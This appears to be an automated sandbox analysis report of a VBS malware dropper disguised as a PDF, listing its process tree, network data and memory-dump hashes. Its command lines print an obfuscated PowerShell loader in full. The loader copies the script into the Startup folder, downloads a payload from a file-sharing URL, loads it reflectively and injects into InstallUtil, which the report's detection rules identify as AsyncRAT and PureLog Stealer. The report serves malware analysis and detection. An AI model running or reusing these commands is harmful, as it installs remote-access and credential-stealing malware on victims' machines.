                                                                                                        2024-11-20 19:34:11 UTC6704INData Raw: 6c 45 41 41 41 67 55 6a 4a 38 68 43 41 41 67 4b 6f 49 41 41 41 51 41 30 55 41 48 41 68 67 72 63 41 41 51 41 41 41 79 2f 2f 2f 50 6e 34 41 77 45 4b 41 41 41 70 67 69 43 41 41 41 4b 76 42 48 41 68 77 70 63 4b 41 41 41 6e 38 6d 43 41 41 67 4a 6f 59 41 41 41 63 45 4b 4b 41 41 41 6c 38 6d 43 41 41 51 49 76 42 48 41 68 51 70 63 43 6f 41 41 41 51 43 4b 71 41 41 41 41 73 44 4f 2f 2f 2f 2f 4f 69 7a 2f 2f 2f 2f 64 34 59 79 2f 2f 2f 66 67 36 59 41 41 41 63 42 4b 41 41 41 41 41 41 43 41 41 41 67 57 35 51 41 41 41 63 68 66 2f 2f 2f 2f 6f 69 6a 43 41 41 77 49 76 52 41 41 41 55 67 66 45 41 41 41 51 34 48 42 41 41 51 43 2b 52 41 41 41 6f 68 66 4b 41 41 41 69 38 6d 43 41 41 51 49 76 42 48 41 68 51 6f 63 43 51 41 41 41 45 68 66 45 41 41 41 4d 34 6e 42 41 41 67 54 6f 41 51
                                                                                                        Data Ascii: lEAAAgUjJ8hCAAgKoIAAAQA0UAHAhgrcAAQAAAy///Pn4AwEKAAApgiCAAAKvBHAhwpcKAAAn8mCAAgJoYAAAcEKKAAAl8mCAAQIvBHAhQpcCoAAAQCKqAAAAsDO////Oiz////d4Yy///fg6YAAAcBKAAAAAACAAAgW5QAAAchf////oijCAAwIvRAAAUgfEAAAQ4HBAAQC+RAAAohfKAAAi8mCAAQIvBHAhQocCQAAAEhfEAAAM4nBAAgToAQ


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:14:33:27
                                                                                                        Start date:20/11/2024
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LETA_pdf.vbs"
                                                                                                        Imagebase:0x7ff6202e0000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:2
                                                                                                        Start time:14:33:32
                                                                                                        Start date:20/11/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
                                                                                                        Imagebase:0x7ff610c50000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:3
                                                                                                        Start time:14:33:32
                                                                                                        Start date:20/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff66e660000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:4
                                                                                                        Start time:14:33:32
                                                                                                        Start date:20/11/2024
                                                                                                        Path:C:\Windows\System32\PING.EXE
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:ping 127.0.0.1 -n 10
                                                                                                        Imagebase:0x7ff6812b0000
                                                                                                        File size:22'528 bytes
                                                                                                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:14:33:42
                                                                                                        Start date:20/11/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell -command [System.IO.File]::Copy('C:\Windows\system32\LETA_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
                                                                                                        Imagebase:0x7ff66e660000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:7
                                                                                                        Start time:14:33:44
                                                                                                        Start date:20/11/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlhZaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lsZS9nZXQ/ZicrJ2lsZWtleT0yJysnQWFfYldvOVJldTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBmWFk7UGhSJysnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtQaFJpJysnbWFnZUJ5dGVzID0gUGhSd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YShQaFJpbWFnZVVybCk7UGhSaW1hZ2VUZXh0ID0gW1N5Jysnc3RlbS5UZXh0LkVuY28nKydkaW5nXTo6VVRGOC5HZXRTdHJpbmcoUGhSaW1hZ2VCeScrJ3Rlcyk7UGhSc3RhcnQnKydGbGFnID0gZlhZPDxCQVNFNjRfU1RBUlQ+PmZYWTtQaFJlbmRGbGFnID0gZlhZPDwnKydCQVNFNjRfRU5EPj5mWFk7UGhSc3RhcnRJbmQnKydleCA9IFBoUmltYWdlVGV4dC5JJysnbmRlJysneE9mKFBoUnN0YXJ0RmxhZyk7UGhSZW5kSW5kZXggPSBQaFJpbWFnZVRleHQuSW5kZXhPZihQaFJlbmRGbGEnKydnKTtQaFJzdGFydEluZGV4IC1nZSAwIC1hbmQgUGhSZW5kSW5kZXggLWd0IFBoUnN0YXJ0SW5kZXg7UCcrJ2hSc3RhcnRJbmRleCArPSBQaFJzJysndGFydEZsYWcuTGVuZ3RoO1BoUmJhc2U2NExlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZyhQaFJzdGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFBoUmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSB1TFQgRm9yRWFjaC1PYmplY3QgeyBQaFInKydfIH0pWy0xLi4tKFBoUmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07UGhSY29tbWFuZEJ5dGVzID0gW1N5c3QnKydlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhQaFJiJysnYXNlNjRSZXZlcnNlZCk7UGhSbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFBoUmNvbW1hbmRCeXRlcyk7UGhSdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChmWFlWQUlmWFkpO1BoUnZhaU1ldGhvZC5JbnZva2UoUGhSbnVsbCwgQChmWFl0eHQuNzBvMWp6L2VvbS54b2J0YWMuc2VsaWYvLzpzcHR0aGZYWSwgZlhZZGVzJysnYXRpdmFkb2ZYWSwgZlhZZGVzYXRpdmFkb2ZYWSwgZlgnKydZZGVzYXRpdmFkb2ZYWSwgZlhZSW5zdGFsbFV0aWxmWFksIGZYWWRlc2F0aXZhZG9mWCcrJ1ksIGZYWWRlc2F0aXZhZG9mWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWWRlc2F0aXZhZG8nKydmWFksZlhZZGVzYXRpdmFkb2ZYWSxmWFlkZXNhdGl2YWRvZlhZLGZYWTFmWFksZlhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2K1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:8
                                                                                                        Start time:14:33:44
                                                                                                        Start date:20/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff66e660000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:9
                                                                                                        Start time:14:33:44
                                                                                                        Start date:20/11/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pSHOMe[4]+$psHOME[30]+'X') (('PhRimageUrl'+' = fXYhttps://1017.filemail.com/api/f'+'ile/get?f'+'ilekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f fXY;PhR'+'webClient = New-Object System.Net.WebClient;PhRi'+'mageBytes = PhRwebClient.'+'DownloadData(PhRimageUrl);PhRimageText = [Sy'+'stem.Text.Enco'+'ding]::UTF8.GetString(PhRimageBy'+'tes);PhRstart'+'Flag = fXY<<BASE64_START>>fXY;PhRendFlag = fXY<<'+'BASE64_END>>fXY;PhRstartInd'+'ex = PhRimageText.I'+'nde'+'xOf(PhRstartFlag);PhRendIndex = PhRimageText.IndexOf(PhRendFla'+'g);PhRstartIndex -ge 0 -and PhRendIndex -gt PhRstartIndex;P'+'hRstartIndex += PhRs'+'tartFlag.Length;PhRbase64Length = PhRendIndex - PhRstartIndex;PhRbase64Command = PhRimageText.Substring(PhRstartIndex'+', PhRbase64Length);PhRbase64Reversed = -join (PhRbase64Command.ToCharArray() uLT ForEach-Object { PhR'+'_ })[-1..-(PhRbase64Command.Length)];PhRcommandBytes = [Syst'+'em.Convert]::FromBase64String(PhRb'+'ase64Reversed);PhRloadedAssembly = [System.Reflection.Assembly]::Load(PhRcommandBytes);PhRvaiMethod = [dnlib.IO'+'.Home].GetMethod(fXYVAIfXY);PhRvaiMethod.Invoke(PhRnull, @(fXYtxt.70o1jz/eom.xobtac.selif//:sptthfXY, fXYdes'+'ativadofXY, fXYdesativadofXY, fX'+'YdesativadofXY, fXYInstallUtilfXY, fXYdesativadofX'+'Y, fXYdesativadofXY,fXYdesativadofXY,fXYdesativadofXY,fXYdesativado'+'fXY,fXYdesativadofXY,fXYdesativadofXY,fXY1fXY,fXYdesativadofXY));').REplACE(([chAR]102+[chAR]88+[chAR]89),[stRINg][chAR]39).REplACE(([chAR]117+[chAR]76+[chAR]84),'|').REplACE('PhR','$') )"
                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:13
                                                                                                        Start time:14:34:10
                                                                                                        Start date:20/11/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                        Imagebase:0xb30000
                                                                                                        File size:42'064 bytes
                                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000002.3420074750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.3420074750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000002.3427696368.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:moderate
                                                                                                        Has exited:false

                                                                                                        Reset < >
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2296091902.00007FFD348D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_7ffd348d0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0d71bc1cd4c506fd3c123d2d1de5bc4892aa4a9526db196d3861955e6d743b03
                                                                                                          • Instruction ID: f66e57ca87640ff8714b19e46069f43ca54cf5ce662858d1c500b20892f969eb
                                                                                                          • Opcode Fuzzy Hash: 0d71bc1cd4c506fd3c123d2d1de5bc4892aa4a9526db196d3861955e6d743b03
                                                                                                          • Instruction Fuzzy Hash: 94119132B0FA894FEB65EB5884A42B87BA1EF56310B1801FEC54DD7193DA29A845C311
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2295841729.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_7ffd34800000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                          • Instruction ID: 2c51019606300730ce27e9822e8784dc8e2cbd8eaf94d2a0ff1bedbd590144b0
                                                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                          • Instruction Fuzzy Hash: 9C01A73021CB0C4FD754EF0CE051AA9B3E0FB85324F10052DE58AC3651D636E882CB41
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2295841729.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_7ffd34800000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,M_^
                                                                                                          • API String ID: 0-34794593
                                                                                                          • Opcode ID: 12f7536263818c84c2805e4228b9040ad8a45a62a452979a461c801bbcbe0fbb
                                                                                                          • Instruction ID: bbf53e598ed78a55cf26c87ef6b4abc03f643c95b0f2fcc8208095013a79ce4f
                                                                                                          • Opcode Fuzzy Hash: 12f7536263818c84c2805e4228b9040ad8a45a62a452979a461c801bbcbe0fbb
                                                                                                          • Instruction Fuzzy Hash: 90418D93E2EAC66AF673572819F90D93FD5EF1326470A11B2C394C9097FD0D2907B102
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2295841729.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_7ffd34800000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 54bd7a3a7d9e3e888500ca0436db3939b3ce5d3c65fc90495f1302b3ba1b855e
                                                                                                          • Instruction ID: 61272e51d614de0a5ba911501516c282d21881b2136101ec528c422a4c8339e6
                                                                                                          • Opcode Fuzzy Hash: 54bd7a3a7d9e3e888500ca0436db3939b3ce5d3c65fc90495f1302b3ba1b855e
                                                                                                          • Instruction Fuzzy Hash: 7BB1C227B0D6969BD711AB6DE8F20EA3BA0EF4333970902F7D284CA093DE185047D754
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2295841729.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_7ffd34800000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e73def0e351b41c9a98dbbf3721ea7c7edc0e685247a99be3cc81aecfd2dc250
                                                                                                          • Instruction ID: 003f47d41c4aa3e3f745200d12e1222b4b799daed4ad8bc49527b39ce104e2a0
                                                                                                          • Opcode Fuzzy Hash: e73def0e351b41c9a98dbbf3721ea7c7edc0e685247a99be3cc81aecfd2dc250
                                                                                                          • Instruction Fuzzy Hash: BC51A257B1E6D22AF762473C6CB60E97FA0EF5362070901B7C6D8CB093EE4D2C06A251
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2997347657.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffd34890000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                          • Instruction ID: bf533fd274c58afd781b72c11c81cc6882029034b975418c297449fcca739756
                                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                          • Instruction Fuzzy Hash: 5D01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651D736E882CB45
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.3426493114.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_1380000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: \V@n
                                                                                                          • API String ID: 0-2463972958
                                                                                                          • Opcode ID: 7e8a239db5b232f2a0ce67347dec48f7903030d7857d1ccec000d03c7d9f8171
                                                                                                          • Instruction ID: 1cf02bb17c05a113339cc04c6178aafc3bd41253ac69426eda332dd37a3624ed
                                                                                                          • Opcode Fuzzy Hash: 7e8a239db5b232f2a0ce67347dec48f7903030d7857d1ccec000d03c7d9f8171
                                                                                                          • Instruction Fuzzy Hash: 16B14DB0E10309CFDF10DFA9C9857DEBBF2AF88718F248529E415A7294EB749845CB91
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.3426493114.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_1380000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 88430ee7d39f8d1dd076593f1e2356e93372d916fec23560b4e7586ed35c9021
                                                                                                          • Instruction ID: 1920583d24c0a0350670695fd80e12cd87cd3a6debb57921a979c06dd19d1e06
                                                                                                          • Opcode Fuzzy Hash: 88430ee7d39f8d1dd076593f1e2356e93372d916fec23560b4e7586ed35c9021
                                                                                                          • Instruction Fuzzy Hash: B0B14F70E10309CFEF10EFA9C8857ADBFF2AF88718F248529E415A7254EB749845CB81
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.3426493114.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_1380000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: \V@n$\V@n
                                                                                                          • API String ID: 0-269168472
                                                                                                          • Opcode ID: 1fe59482e930788c474de845ae9e417cc961cc7244a4e154226717c7757ed2e6
                                                                                                          • Instruction ID: 64593724e3c99d75d85dd072482cc18d27490628c7607bdf7ad4ec7cd5bd88b1
                                                                                                          • Opcode Fuzzy Hash: 1fe59482e930788c474de845ae9e417cc961cc7244a4e154226717c7757ed2e6
                                                                                                          • Instruction Fuzzy Hash: 91714970E00349CFDB14DFADC895B9EBBF2AF88718F248129E419A7254EB749841CF91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.3426493114.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_1380000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: \V@n$\V@n
                                                                                                          • API String ID: 0-269168472
                                                                                                          • Opcode ID: 0c70fdca5aabef228a5f8bdfa089c174e0c4b567abf234011ebb763d1e2fc590
                                                                                                          • Instruction ID: 5ddb0f3ec9d78019eb6f952a1ba284624a12371c2911075ce965f0dbe033f229
                                                                                                          • Opcode Fuzzy Hash: 0c70fdca5aabef228a5f8bdfa089c174e0c4b567abf234011ebb763d1e2fc590
                                                                                                          • Instruction Fuzzy Hash: 687148B1E00349CFDB11DFADC985B9EBBF2AF88718F248129D419A7254EB749841CF91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.3426493114.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_1380000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: \V@n
                                                                                                          • API String ID: 0-2463972958
                                                                                                          • Opcode ID: f14e744c6fc6a45fe9981ac3f7670b98ffae106ace98b8098996eea48d8bd9e8
                                                                                                          • Instruction ID: cabe67354cee7e4a34a3887628171f1092bda49dd9150e70b7c62357224da759
                                                                                                          • Opcode Fuzzy Hash: f14e744c6fc6a45fe9981ac3f7670b98ffae106ace98b8098996eea48d8bd9e8
                                                                                                          • Instruction Fuzzy Hash: 57B13CB0E10309CFDB11DFA8C9857DEBBF2AF88718F248129E415A7294EB749845CB91
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.3426493114.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_1380000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ./\
                                                                                                          • API String ID: 0-3176372042
                                                                                                          • Opcode ID: c86cb7abcb0d479e4994b735b9122299d840616d580622e366f4561160fc64bd
                                                                                                          • Instruction ID: 30815e8221450b823b24db3ca1f888c278e1f7c00bb8cece835152ac7e7f7ff7
                                                                                                          • Opcode Fuzzy Hash: c86cb7abcb0d479e4994b735b9122299d840616d580622e366f4561160fc64bd
                                                                                                          • Instruction Fuzzy Hash: 05617C31A04316CFCB15DF68D4406AEBBF2BF85314F2485AAE419AB781DB71E946CB90
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.3426493114.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_1380000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: |
                                                                                                          • API String ID: 0-2343686810
                                                                                                          • Opcode ID: 54e33e3777a98107cac9812b06939cf71bd55f3323e8186ff6e3f4ebe5bcdc17
                                                                                                          • Instruction ID: d9fd0896a67fb3af709cdb3fc1eab7e4c8c21897c9871f045b7078c612acaf88
                                                                                                          • Opcode Fuzzy Hash: 54e33e3777a98107cac9812b06939cf71bd55f3323e8186ff6e3f4ebe5bcdc17
                                                                                                          • Instruction Fuzzy Hash: BC119A75F002259FDB40EB78D905B6E7BF5AF48610F10846AEA0AEB790DA34AD01CB80
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.3426493114.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_1380000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a12abc0d118f0e75ad854e29e57f48e60595f3090bd38e5c9d784a1659ceb560
                                                                                                          • Instruction ID: 222239e7c6404234a75f60004be0dbd3b72c21a7783b22a811297a80f31cb4ed
                                                                                                          • Opcode Fuzzy Hash: a12abc0d118f0e75ad854e29e57f48e60595f3090bd38e5c9d784a1659ceb560
                                                                                                          • Instruction Fuzzy Hash: 45D12874B006158FDB54EFA9C594A6EBBF2BF88704F208168E506EB365DB70EC41CB50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.3426493114.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_1380000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6374841cfcc5819bfce23756933ebc5ab60fe65fb9a53890fd708ff6933bf29c
                                                                                                          • Instruction ID: 9563632e105b68814ade86aebcd43c47d788a5e2cfa4d1c367c9ca5489d7ef8a
                                                                                                          • Opcode Fuzzy Hash: 6374841cfcc5819bfce23756933ebc5ab60fe65fb9a53890fd708ff6933bf29c
                                                                                                          • Instruction Fuzzy Hash: 2FB15E70E10319CFEF10EFA8C9857ADBFF2AF88718F248529E415A7254EB749845CB91
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.3426493114.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_1380000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4c01dce7d6424604da95f2f6d41fc31ed19b0f32d02404ba6204758e6b818704
                                                                                                          • Instruction ID: 68c77bc1689cad1b0cd56846af7765ec197df0d888c2ca1b7b75d2d8172c1532
                                                                                                          • Opcode Fuzzy Hash: 4c01dce7d6424604da95f2f6d41fc31ed19b0f32d02404ba6204758e6b818704
                                                                                                          • Instruction Fuzzy Hash: 43914D38B00651CFCB19AF34E45852D7BB7FB8A305B20892DD902E7358DF75A846CB84
                                                                                                          Memory Dump Source
